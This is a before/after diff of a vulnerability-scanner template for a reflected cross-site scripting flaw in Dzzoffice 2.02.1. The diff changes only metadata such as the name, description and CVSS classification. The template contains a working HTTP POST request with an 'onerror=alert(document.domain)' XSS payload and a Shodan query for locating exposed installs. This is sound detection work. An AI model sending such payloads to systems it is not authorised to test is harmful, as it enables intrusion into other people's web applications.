vulnerabilities/other/dzzoffice-xss.yaml (before)
id: dzzoffice-xss

info:
  name: Dzzoffice 2.02.1_SC_UTF8 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    A XSS vulnerability was discovered in dzzoffice 2.02.1_SC_UTF8, There is a Reflected XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the zero parameter.
  reference:
    - https://github.com/zyx0814/dzzoffice/issues/183
  metadata:
    verified: true
    shodan-query: http.html:"dzzoffice"
  tags: dzzoffice,xss

requests:
  - raw:
      - |
        POST /index.php?mod=system&op=orgtree&do=orgtree HTTP/1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        id=%23&nouser=0&moderator=0&zero=<img+src=x+onerror=alert(document.domain)>&stype=0&range=0&showjob=0

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"text":"<img src=x onerror=alert(document.domain)>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

vulnerabilities/other/dzzoffice-xss.yaml (after)
id: dzzoffice-xss

info:
  name: Dzzoffice 2.02.1 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    Dzzoffice 2.02.1_SC_UTF8 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the zero parameter.
  reference:
    - https://github.com/zyx0814/dzzoffice/issues/183
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
    shodan-query: http.html:"dzzoffice"
  tags: dzzoffice,xss

requests:
  - raw:
      - |
        POST /index.php?mod=system&op=orgtree&do=orgtree HTTP/1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        id=%23&nouser=0&moderator=0&zero=<img+src=x+onerror=alert(document.domain)>&stype=0&range=0&showjob=0

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"text":"<img src=x onerror=alert(document.domain)>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by md on 2022/09/20

vulnerabilities/other/dzzoffice-xss.yaml (diff)
@@ -1,13 +1,17 @@
 id: dzzoffice-xss
 
 info:
-  name: Dzzoffice 2.02.1_SC_UTF8 - Cross-Site Scripting
+  name: Dzzoffice 2.02.1 - Cross-Site Scripting
   author: arafatansari
   severity: medium
   description: |
-    A XSS vulnerability was discovered in dzzoffice 2.02.1_SC_UTF8, There is a Reflected XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the zero parameter.
+    Dzzoffice 2.02.1_SC_UTF8 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the zero parameter.
   reference:
     - https://github.com/zyx0814/dzzoffice/issues/183
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   metadata:
     verified: true
     shodan-query: http.html:"dzzoffice"
@@ -36,3 +40,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by md on 2022/09/20
